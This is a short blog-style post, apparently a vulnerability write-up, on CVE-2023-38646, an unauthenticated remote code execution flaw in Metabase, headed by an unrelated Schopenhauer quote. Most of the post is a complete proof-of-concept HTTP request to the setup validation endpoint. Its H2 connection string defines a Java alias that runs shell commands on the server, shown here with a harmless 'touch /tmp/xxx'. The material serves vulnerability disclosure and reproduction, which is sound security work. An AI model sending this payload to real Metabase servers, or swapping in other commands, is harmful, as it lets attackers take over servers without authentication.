so.cl

Rascals are always sociable, and the chief sign that a man has any nobility in his character is the little pleasure he takes in others company. Arthur Schopenhauer


CVE-2023-38646: Metabase Pre-auth RCE

Metabase is a popular business intelligence and data visualization software package. Earlier this week, it was reported that Metabase open source before 0.46.6.1 and Metabase Enterprise before 1.46.6.1 has a vulnerability that allows attackers to execute arbitrary commands on the server, at the server’s privilege level. Authentication is not required for exploitation. This vulnerability was designated as CVE-2023-38646. Reproducing CVE-2023-38646: Metabase Pre-auth RCE

PoC:

POST /api/setup/validate HTTP/1.1
Host: localhost:3000
Content-Length: 416
Accept: application/json
Content-Type: application/json
User-Agent: Mozilla/5.0 
Connection: close

{"token":"d66c72f1-ddf7-4d55-aaff-53ffbd4fbb7b","details":{"details":{
"subprotocol":"h2",
"classname":"org.h2.Driver","advanced-options":true,
"subname":"mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=CREATE ALIAS SHELLEXEC AS $$ void shellexec(String cmd) throws java.io.IOException {Runtime.getRuntime().exec(new String[]{\"sh\", \"-c\", cmd})\\;}$$\\;CALL SHELLEXEC('touch /tmp/xxx');"},"name":"x","engine":"postgres"}}
July 28, 2023
#vulnerability#cve